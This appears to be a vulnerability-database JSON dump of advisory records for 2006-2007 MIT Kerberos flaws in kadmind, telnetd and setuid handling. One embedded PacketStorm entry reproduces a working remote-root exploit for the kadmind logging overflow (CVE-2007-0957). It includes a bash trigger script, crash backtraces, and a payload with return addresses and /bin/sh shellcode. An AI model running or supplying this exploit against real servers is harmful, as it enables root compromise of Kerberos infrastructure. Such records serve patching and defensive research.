(lib/gssapi/krb5/k5unseal.c), as used by the Kerberos administration daemon (kadmind) in MIT krb5 before 1.6.1, when used with the authentication method provided by the RPCSEC_GSS RPC library, allows remote authenticated users to execute arbitrary code and modify the Kerberos key database via a message with an \"an invalid direction encoding\".", "cvss3": {}, "published": "2007-04-06T01:19:00", "type": "cve", "title": "CVE-2007-1216", "cwe": ["CWE-415"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1216"], "modified": "2021-02-02T18:22:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:6.10", "cpe:/o:debian:debian_linux:4.0", "cpe:/o:canonical:ubuntu_linux:5.10", "cpe:/o:canonical:ubuntu_linux:6.06", "cpe:/o:debian:debian_linux:3.1"], "id": "CVE-2007-1216", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1216", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:6.06:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:6.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:5.10:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:3.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-28T14:00:58", "description": "The telnet daemon (telnetd) in MIT krb5 before 1.6.1 allows remote attackers to bypass authentication and gain system access via a username beginning with a '-' character, a similar issue to CVE-2007-0882.", "cvss3": {}, "published": "2007-04-06T01:19:00", "type": "cve", "title": "CVE-2007-0956", "cwe": ["CWE-306"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0882", "CVE-2007-0956"], "modified": "2021-02-02T18:23:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:6.10", "cpe:/o:debian:debian_linux:4.0", "cpe:/o:canonical:ubuntu_linux:5.10", "cpe:/o:canonical:ubuntu_linux:6.06", "cpe:/o:debian:debian_linux:3.1"], "id": "CVE-2007-0956", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0956", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:6.06:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:6.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:5.10:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:3.1:*:*:*:*:*:*:*"]}], "debiancve": [{"lastseen": "2023-05-28T14:30:19", "description": "The (1) ftpd and (2) ksu programs in (a) MIT Kerberos 5 (krb5) up to 1.5, and 1.4.x before 1.4.4, and (b) Heimdal 0.7.2 and earlier, do not check return codes for setuid calls, which might allow local users to gain privileges by causing setuid to fail to drop privileges. NOTE: as of 20060808, it is not known whether an exploitable attack scenario exists for these issues.", "cvss3": {}, "published": "2006-08-09T10:04:00", "type": "debiancve", "title": "CVE-2006-3084", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3084"], "modified": "2006-08-09T10:04:00", "id": "DEBIANCVE:CVE-2006-3084", "href": "https://security-tracker.debian.org/tracker/CVE-2006-3084", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T14:30:19", "description": "The (1) krshd and (2) v4rcp applications in (a) MIT Kerberos 5 (krb5) up to 1.5, and 1.4.x before 1.4.4, when running on Linux and AIX, and (b) Heimdal 0.7.2 and earlier, do not check return codes for setuid calls, which allows local users to gain privileges by causing setuid to fail to drop privileges using attacks such as resource exhaustion.", "cvss3": {}, "published": "2006-08-09T10:04:00", "type": "debiancve", "title": "CVE-2006-3083", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3083"], "modified": "2006-08-09T10:04:00", "id": "DEBIANCVE:CVE-2006-3083", "href": "https://security-tracker.debian.org/tracker/CVE-2006-3083", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T14:30:19", "description": "Stack-based buffer overflow in the krb5_klog_syslog function in the kadm5 library, as used by the Kerberos administration daemon (kadmind) and Key Distribution Center (KDC), in MIT krb5 before 1.6.1 allows remote authenticated users to execute arbitrary code and modify the Kerberos key database via crafted arguments, possibly involving certain format string specifiers.", "cvss3": {}, "published": "2007-04-06T01:19:00", "type": "debiancve", "title": "CVE-2007-0957", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0957"], "modified": "2007-04-06T01:19:00", "id": "DEBIANCVE:CVE-2007-0957", "href": "https://security-tracker.debian.org/tracker/CVE-2007-0957", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T14:30:19", "description": "Double free vulnerability in the GSS-API library (lib/gssapi/krb5/k5unseal.c), as used by the Kerberos administration daemon (kadmind) in MIT krb5 before 1.6.1, when used with the authentication method provided by the RPCSEC_GSS RPC library, allows remote authenticated users to execute arbitrary code and modify the Kerberos key database via a message with an \"an invalid direction encoding\".", "cvss3": {}, "published": "2007-04-06T01:19:00", "type": "debiancve", "title": "CVE-2007-1216", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1216"], "modified": "2007-04-06T01:19:00", "id": "DEBIANCVE:CVE-2007-1216", "href": "https://security-tracker.debian.org/tracker/CVE-2007-1216", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T14:30:19", "description": "The telnet daemon (telnetd) in MIT krb5 before 1.6.1 allows remote attackers to bypass authentication and gain system access via a username beginning with a '-' character, a similar issue to CVE-2007-0882.", "cvss3": {}, "published": "2007-04-06T01:19:00", "type": "debiancve", "title": "CVE-2007-0956", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0882", "CVE-2007-0956"], "modified": "2007-04-06T01:19:00", "id": "DEBIANCVE:CVE-2007-0956", "href": "https://security-tracker.debian.org/tracker/CVE-2007-0956", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:24", "description": "", "cvss3": {}, "published": "2007-04-11T00:00:00", "type": "packetstorm", "title": "kadmind-overflow.txt", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2007-04-11T00:00:00", "id": "PACKETSTORM:55828", "href": "https://packetstormsecurity.com/files/55828/kadmind-overflow.txt.html", "sourceData": "`Kerberos Version 1.5.1 Kadmind Remote Root Buffer Overflow Vulnerability \n \n \nThe Issue: \nRemotely exploitable buffer overflow vulnerability in Kerberos kadmind service \n \nThe Versions: \nkrb5-1.5.1 (Latest version from http://eb.mit.edu/Kerberos/ ) \nkrb5-server-1.4.3-5.1 (Latest version from Fedora yum update) \n \nThe Environment: \nLinux Fedora Core 5 x86_64 bit \n \nThe Overview: \n \nThere is a remotly exploitable overflow bug in Kerberos kadmind service that can be triggered during the administration \nof principals via kadmin or kadmin.local and either in a local context or a remote context, which will allow the attacker \nthe possibility of having Kerberos server yield the permissions of the user that it is running a, usually root. It can \nalso be used as a denail of service against kadmind. \n \nroot 1834 1 0 22:29 ? 00:00:00 /usr/kerberos/sbin/krb5kdc \nroot 6600 1 0 23:00 ? 00:00:00 /usr/kerberos/sbin/kadmind \n \nTo trigger the exploit, a valid user account has to first of all authenticate to the Kerberos service and have a ticket \ngenerated, the user therefor must be or have access to an admin account that can access thre remote kadmind \nservice, which limits the scope of the attack slightly. However, this still allows anyone with the most limited access \nto the service to kill it or gain root access and as such should be treated as critical. \n \nA trivial issue encountered was that the kadmin client would filter out crazy strings passed to it, so you can't use it \nby default to send in shellcode and return addresses. To get around that we modify the client source code a bit to \nhonour our malicious values and then upload it to our user directory, and as if by magic it will no longer bail when it \nencounters these strings ;) \n \n \nFollowing is the vulnerable function with the unused code, ifdefs and comments removed to make it easier to read \n \n/* krb5-1.5.1/src/lib/kadm5/logger.c \n \nstatic int \nklog_vsyslog(int priority, const char *format, va_list arglist) \n{ \nchar outbuf[KRB5_KLOG_MAX_ERRMSG_SIZE]; \nchar *syslogp; \n \nstrncpy(outbuf, ctime(&now) + 4, 15); \ncp += 15; \n \nsyslogp = &outbuf[strlen(outbuf)]; \n \nvsprintf(syslogp, format, arglist); \n \n*/ \n \n \nBy exersizing any of the option presented to us in kadmin, we should be able to trigger this little bug, including: \n \nadd_principal \ndelete_principal \nmodify_principal \nchange_password \nget_principal \n... and on..... \n \nAnother nice feature to kadmin is that it is possible to run it from the command line, and as such this makes crafting \na payload much easier :) by running the following script, it should be possible to trigger this bug and kill kadmind: \n \n########## \n \n#!/bin/bash \nADDIT=\"get_principal\" \nATTACK=\"cr4yz33_h4xx0r\" \nKADMIN=\"/usr/kerberos/sbin/kadmin\" \nKADMINDP=\"`netstat -anp --ip | grep kadmin | grep LISTEN | awk '{print $4}'| sed -e s/0.0.0.0://`\" \nPRINCIPAL=\"root/admin@OPEN-SECURITY.ORG\" \nTARGET=coredump.open-security.org \nTRIGGAH=\"`perl -e 'print \"A\" x 5000'`\" \n \n$KADMIN -s $TARGET:$KADMINDP -p $PRINCIPAL -q \"$ADDIT -pw $ATTACK $TRIGGAH\" \n \n########## \n \n \nAfter running this script with various sized buffer values, we get faults in the following locations: \n \n// With 2000 A's // \n#0 0x0000003a2ed427d5 in vfprintf () from /lib64/libc.so.6 \n#1 0x0000003a2ed5fc79 in vsprintf () from /lib64/libc.so.6 \n#2 0x00002aaaaaabb2ea in klog_vsyslog (priority=5, \nformat=0x40c4e0 \"Request: %s, %s, %s, client=%s, service=%s, addr=%s\", arglist=0x7ffffdb40e60) \nat logger.c:854 \n#3 0x4141414141414141 in ?? () \n#4 0x4141414141414141 in ?? () \n#5 0x4141414141414141 in ?? () \n.... \n \n \n// With 5000 A's (On the Fedora version) // \n#0 0x00002aaaab65fc90 in strlen () from /lib64/libc.so.6 \n#1 0x00002aaaab63088b in vfprintf () from /lib64/libc.so.6 \n#2 0x00002aaaab6ca8ad in __vsprintf_chk () from /lib64/libc.so.6 \n#3 0x00002aaaaabd2283 in krb5_klog_syslog () from /usr/lib64/libkadm5srv.so.5 \n#4 0x4141414141414141 in ?? () \n#5 0x4141414141414141 in ?? () \n.... \n \n \n// With 30000 a's // \n#0 0x0000003a2ed750ae in mempcpy () from /lib64/libc.so.6 \n#1 0x0000003a2ed69a5b in _IO_default_xsputn_internal () from /lib64/libc.so.6 \n#2 0x0000003a2ed44294 in vfprintf () from /lib64/libc.so.6 \n#3 0x0000003a2ed5fc79 in vsprintf () from /lib64/libc.so.6 \n#4 0x00002aaaaaabb2ea in klog_vsyslog (priority=5, \nformat=0x40c4e0 \"Request: %s, %s, %s, client=%s, service=%s, addr=%s\", arglist=0x7fffbe94f220) \nat logger.c:854 \n#5 0x6161616161616161 in ?? () \n.... \n \n \n \nIn our vulnerable code we have the function klog_vsyslog, which is a lame attempt to create a custom logger, as we can \nsee by the result of this advisory. \n \n \nHere is the working exploit: \n \n#!/bin/bash \nADDIT=\"get_principal\" \nATTACK=\"cr4yz33_h4xx0r\" \nKADMIN=\"kadmin\" \nKADMINDP=\"`netstat -anp --ip | grep kadmin | grep LISTEN | awk '{print \n$4}'| sed -e s/0.0.0.0://`\" \nPRINCIPAL=\"root/admin@OPEN-SECURITY.ORG\" \nTARGET=debauch.open-security.org \nTRIGGAH=\"`perl -e 'print \"A\" x 900'`PAD`perl -e 'printf \"\\xc0\\xfa\\xff\\xbf\\x88\\xf8\\xff\\xbf\" x 20'``perl -e 'print \n\"C\" x 6'``perl -e 'print \"\\x90\" x 50'` \n`echo -e \"\\xb0\\x0b\\x99\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\\x89\\xe1\\xcd\\x80\"`\" \n \n$KADMIN -s $TARGET:$KADMINDP -p $PRINCIPAL -q \"$ADDIT $TRIGGAH\" \n \n###end \n \nReference: \nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=500 \n \n \n`\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/55828/kadmind-overflow.txt"}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:36:07", "description": "Kerberos is a protocol suite which allows for the negotiation of authenticated, and optionally encrypted, communication between two points on a network. MIT Kerberos V5 is an implementation of this protocol suite. There exists a buffer overflow vulnerability in MIT Kerberos. The vulnerability is due to a boundary error in the server's logging function in the Kerberos Administration Server (kadmind). A remote, authenticated attacker can exploit this vulnerability by supplying a specially crafted string to the kadmind daemon. Successful exploitation would cause a stack based buffer overflow that can lead to compromising the Kerberos key database, or executing arbitrary code with root privileges on the target host. In a simple attack aiming for denial of service, the Kerberos Administration service (kadmind) will terminate abnormally as a result of an attack. The Kerberos administration functionality remains unavailable until the service is restarted. In a more sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behavior of the system is dependent on the nature the injected code. Any code injected into the vulnerable component would execute in the security context of the service process, which may be system/root level.", "cvss3": {}, "published": "2010-07-27T00:00:00", "type": "checkpoint_advisories", "title": "MIT Kerberos V5 KAdminD klog_vsyslog Server Stack Buffer Overflow (CVE-2007-0957)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0957"], "modified": "2011-11-01T00:00:00", "id": "CPAI-2007-252", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2023-05-28T15:13:03", "description": "Problems addressed by these patches:a. An updated Service Console XFree86 package that fixes a number of security issuesThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the following names CVE-2007-1003, CVE-2007-1351, CVE-2007-1352, and CVE-2007-1667 to these issuesESX 2.5.4 Upgrade Patch 9 (Build# 47255)ESX 2.5.3 Upgrade Patch 12 (Build# 47274)ESX 2.1.3 Upgrade Patch 7 (Build# 47243)ESX 2.0.2 Upgrade Patch 7 (Build# 47268)b. Upgraded UP and SMP kernels for ESX Server 2.5.4 fix a number of security issues.The Common Vulnerabilities and Exposures project(cve.mitre.org) has assigned the names CVE-2005-3055, CVE-2005-3273,CVE-2006-1056, CVE-2006-1342, CVE-2006-1343, CVE-2006-1864, andCVE-2006-2071 to this issue. The new kernel version is 2.4.9-e.71.ESX 2.5.4 Upgrade Patch 9 (Build# 47255)c. An update to the Kerberos network authentication packages provided inthe VMware ESX Server Service Console. Possible vulnerabilities havebeen found with the krb5 telnet daemon, the Kerberos KDC, and kadmin.Although these features are not enabled in the Service Console by default,VMware recommends that all users apply this patch.The Common Vulnerabilities and Exposures project (cve.mitre.org) assignedthe names CVE-2007-0956, CVE-2007-0957, and CVE-2007-1216 to this issue.VMware ESX 3.0.1 without patch ESX-1000073VMware ESX 3.0.0 without patch ESX-1000080", "cvss3": {}, "published": "2007-07-05T00:00:00", "type": "vmware", "title": "Updated Service Console packages (XFree86, UP and SMP kernels, Kerberos libraries) resolve security issues.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-3055", "CVE-2005-3273", "CVE-2006-1056", "CVE-2006-1342", "CVE-2006-1343", "CVE-2006-1864", "CVE-2006-2071", "CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1003", "CVE-2007-1216", "CVE-2007-1351", "CVE-2007-1352", "CVE-2007-1667"], "modified": "2007-07-05T00:00:00", "id": "VMSA-2007-0005", "href": "https://www.vmware.com/security/advisories/VMSA-2007-0005.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}